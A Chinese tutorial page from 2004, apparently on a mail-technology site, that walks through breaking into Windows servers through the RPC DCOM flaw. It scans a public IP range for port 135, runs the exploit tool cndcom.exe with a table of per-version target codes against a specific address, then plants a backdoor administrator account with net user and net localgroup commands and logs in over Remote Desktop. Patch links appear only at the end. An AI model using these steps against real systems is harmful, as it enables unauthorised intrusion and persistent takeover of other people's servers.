首页 | 邮件资讯 | 技术教程 | 解决方案 | 产品评测 | 邮件人才 | 邮件博客 | 邮件系统论坛 | 软件下载 | 邮件周刊 | 热点专题 | 工具
网络技术 | 操作系统 | 邮件系统 | 客户端 | 电子邮箱 | 反垃圾邮件 | 邮件安全 | 邮件营销 | 移动电邮 | 邮件软件下载 | 电子书下载

邮件网络安全

系统安全 | 邮件软件漏洞 | 攻防技术 | 安全基础 | 病毒公告 | 病毒查杀 | Forefront/TMG/ISA | 防火墙 | 数字签名 |
首页 > 邮件网络安全 > 操作系统安全 > 利用RPC漏洞入侵服务器 > 正文

利用RPC漏洞入侵服务器

出处:孙成 作者:孙成 时间:2004-2-19 8:40:00
  微软基于WINNT内核的操作系统都存在一个RPC漏洞,这个漏洞太可怕了,是致命的漏洞,如果你不及时打RPC补丁包,就可能成为别人攻击的目标,他们通过向你发送畸形数据包,导致你的RPC服务进程崩溃,因为许多应用服务程序都依赖于它,就造成这些应用程序服务的拒绝服务,然后就可以通过135端口来提升权限或获得DCOM客户端认证的信息。是不是很可怕,很容易就可以获得管理员权限,控制你的服务器,下面,我们一起来看看入侵存在RPC服务漏洞的服务器的过程。


一、准备工作
   1、需要使用的黑客软件:cndcom.exe(包含一个DLL文件cygwin1.dll),它就是利用RPC溢出的入侵程序,针对几乎所有的WINDOWS版本。
   2、端口扫描工具Superscan,用它扫描135端口的开放情况.


二、技术分析
  要想成功的入侵服务器,需要具备2个条件:1、服务器存在RPC漏洞 2、TCP协议的135端口要是开放状态
 

三、入侵服务器
  所有的工作都准备好了,那么我们开始吧!
   
  1、使用Superscan扫描135端口
   (图一)
    ①使用Superscan工具扫描“218.22.123.*”这个网段的情况。在IP栏“起始”和“结束”中分别输入“218.22.123.1”和“218.22.123.254”。
    ②指定扫描的端口为135端口。“所有的端口定义”为从”135“到”135“。
    ③显示扫描的结果,前面带”+“的都是135端口开放的服务器,这样我们就可以在这些服务器中寻找存在RPC漏洞的机器。

  2、使用cndcom.exe入侵服务器
  入侵服务器需要一定的耐心和运气,对上面扫描到的服务器一一试验,一定会找到存在RPC漏洞的机器。
先拿218.22.123.26作为目标, 好了,试试我们的手气吧!
    (图二)
   ①在命令提示符下输入”cndcom 17 218.22.123.26“,接着要耐心等待,看看我们的运气如何!
  这里有必要把cndcom命令的使用情况说明一下:
        cndcom  <标记>   <目标IP地址>
 
 标记是一系列数字,不同的操作系统,打了不同的补丁,它的标记都是不同的,它的对应情况如下:
      0    Windows 2000 SP0 (英文版)
          1    Windows 2000 SP1 (英文版)
          2    Windows 2000 SP2 (英文版)
          3    Windows 2000 SP3 (英文版)
          4    Windows 2000 SP4 (英文版)
          5    Windows XP SP0 (英文版)
          6    Windows XP SP1 (英文版)
          7    Windows NT SP5 (中文版)
          8    Windows NT SP6 (中文版)
          9    Windows NT SP6 (繁体中文版)
          10   Windows 2000 SP0 (中文版)
          11   Windows 2000 SP1 (中文版)
          12   Windows 2000 SP2 (中文版)
          13   Windows 2000 SP2 (中文版)
          14   Windows 2000 SP3 (中文版)
          15   Windows 2000 SP3 (繁体中文版)
          16   Windows 2000 SP4 (中文版)
          17   Windows 2000 SP4 (中文版)
          18   Windows XP SP1 (中文版)
 现在的服务器一般都采用WIN2000服务器版的操作系统,并打上SP4补丁,因此标记选择”17“入侵服务器的机率就比较大些。
 
 ②我们的手气不错啊!没想到第一次就中奖了。这时在命令提示符下显示"C:\WINNT\SYSTEM32\",我们已经成功的入侵了“218.22.123.26”服务器,从提示符的显示看,这是一台WIN2000服务器。

  3、创建系统管理员帐号
 虽然我们已经成功的入侵服务器,但在命令提示符下控制服务器很复杂,因此,使用NET命令来为自己创建一个管理员帐号。
  (图三)
 ①在“218.22.123.26”服务器上为自己创建一个用户名为rtj,密码为“rrttjj"的帐号。
 在”C:\WINNT\SYSTEM32\“提示符下输入”net user rtj rrttjj /add",然后系统提示“命令成功完成”,这样就创建了rtj帐号,如果你还不放心,使用"net user"命令查一下,看看rtj帐号是否存在。
  ②虽然创建了rtj帐号,但只是一般用户还没有管理员权限,因此要加入到管理员组中。
 在”C:\WINNT\SYSTEM32\“提示符下输入“net localgroup administrators rtj /add",这样就提升“rtj”为系统系统管理员。

四、远程登录服务器
 管理员为了管理方便,经常开通终端服务器,用Superscan扫描3389端口是否开放,经扫描发现“218.22.123.26”的3389端口是开放的,下面我们就可以使用rtj帐号远程登录服务器。
  运行终端服务器客户端软件,IP地址中输入“218.22.123.26”,单击“连接”按钮,然后输入“rtj帐号”的用户名和密码(图四),就可以登录到服务器了,这样一切尽在掌握了。

小提示:
 RPC补丁下载
Windows NT 4.0 Server :
     http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en

Windows 2000:
    http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en

Windows XP :
    http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en

Windows Server 2003 :
   http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en
,
相关文章 热门文章
  • ipc$详细解释大全
  • 利用RPC漏洞入侵服务器
  • 配置策略禁止139/445端口连接
  • 使用windows脚本入侵WINDOWS服务器
  • 木马克星――Trojan Ender正式国际版 2.0.0
  • 让你的终端服务器“固若金汤”
  • 诡秘的DLL木马
  • Windows源码泄露 微软建议用户升级至IE6 SP1
  • 安装Win2003 Server下的Snort
  • 微软最新漏洞公告10号发布 MS04-007最严重
  • 如何配置解决Win2K服务器安全问题
  • 构筑更安全的乐园--Windows安全解决方案解析
  • 自由广告区
     
    最新软件下载
  • SharePoint Server 2010 部署文档
  • Exchange 2010 RTM升级至SP1 教程
  • Exchange 2010 OWA下RBAC实现的组功能...
  • Lync Server 2010 Standard Edition 标..
  • Lync Server 2010 Enterprise Edition...
  • Forefront Endpoint Protection 2010 ...
  • Lync Server 2010 Edge 服务器部署文档
  • 《Exchange 2003专家指南》
  • Mastering Hyper-V Deployment
  • Windows Server 2008 R2 Hyper-V
  • Microsoft Lync Server 2010 Unleashed
  • Windows Server 2008 R2 Unleashed
  • 今日邮件技术文章
  • 腾讯,在创新中演绎互联网“进化论”
  • 华科人 张小龙 (中国第二代程序员 QQ...
  • 微软推出新功能 提高Hotmail密码安全性
  • 快压技巧分享:秒传邮件超大附件
  • 不容忽视的邮件营销数据分析过程中的算..
  • 国内手机邮箱的现状与未来发展——访尚..
  • 易观数据:2011Q2中国手机邮箱市场收入..
  • 穿越时空的爱恋 QQ邮箱音视频及贺卡邮件
  • Hotmail新功能:“我的朋友可能被黑了”
  • 入侵邻居网络发骚扰邮件 美国男子被重..
  • 网易邮箱莫子睿:《非你莫属》招聘多过..
  • 中国电信推广189邮箱绿色账单
  • 最新专题
  • 鸟哥的Linux私房菜之Mail服务器
  • Exchange Server 2010技术专题
  • Windows 7 技术专题
  • Sendmail 邮件系统配置
  • 组建Exchange 2003邮件系统
  • Windows Server 2008 专题
  • ORF 反垃圾邮件系统
  • Exchange Server 2007 专题
  • ISA Server 2006 教程专题
  • Windows Vista 技术专题
  • “黑莓”(BlackBerry)专题
  • Apache James 专题
  • 分类导航
    邮件新闻资讯:
    IT业界 | 邮件服务器 | 邮件趣闻 | 移动电邮
    电子邮箱 | 反垃圾邮件|邮件客户端|网络安全
    行业数据 | 邮件人物 | 网站公告 | 行业法规
    网络技术:
    邮件原理 | 网络协议 | 网络管理 | 传输介质
    线路接入 | 路由接口 | 邮件存储 | 华为3Com
    CISCO技术 | 网络与服务器硬件
    操作系统:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | 其它操作系统
    邮件服务器:
    程序与开发 | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    金笛邮件系统 | 其它 |
    反垃圾邮件:
    综述| 客户端反垃圾邮件|服务器端反垃圾邮件
    邮件客户端软件:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | 雷鸟 | Eudora |Becky! |Pegasus
    IncrediMail |其它
    电子邮箱: 个人邮箱 | 企业邮箱 |Gmail
    移动电子邮件:服务器 | 客户端 | 技术前沿
    邮件网络安全:
    软件漏洞 | 安全知识 | 病毒公告 |防火墙
    攻防技术 | 病毒查杀| ISA | 数字签名
    邮件营销:
    Email营销 | 网络营销 | 营销技巧 |营销案例
    邮件人才:招聘 | 职场 | 培训 | 指南 | 职场
    解决方案:
    邮件系统|反垃圾邮件 |安全 |移动电邮 |招标
    产品评测:
    邮件系统 |反垃圾邮件 |邮箱 |安全 |客户端
    广告联系 | 合作联系 | 关于我们 | 联系我们 | 繁體中文
    版权所有:邮件技术资讯网©2003-2010 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   粤ICP备05009143号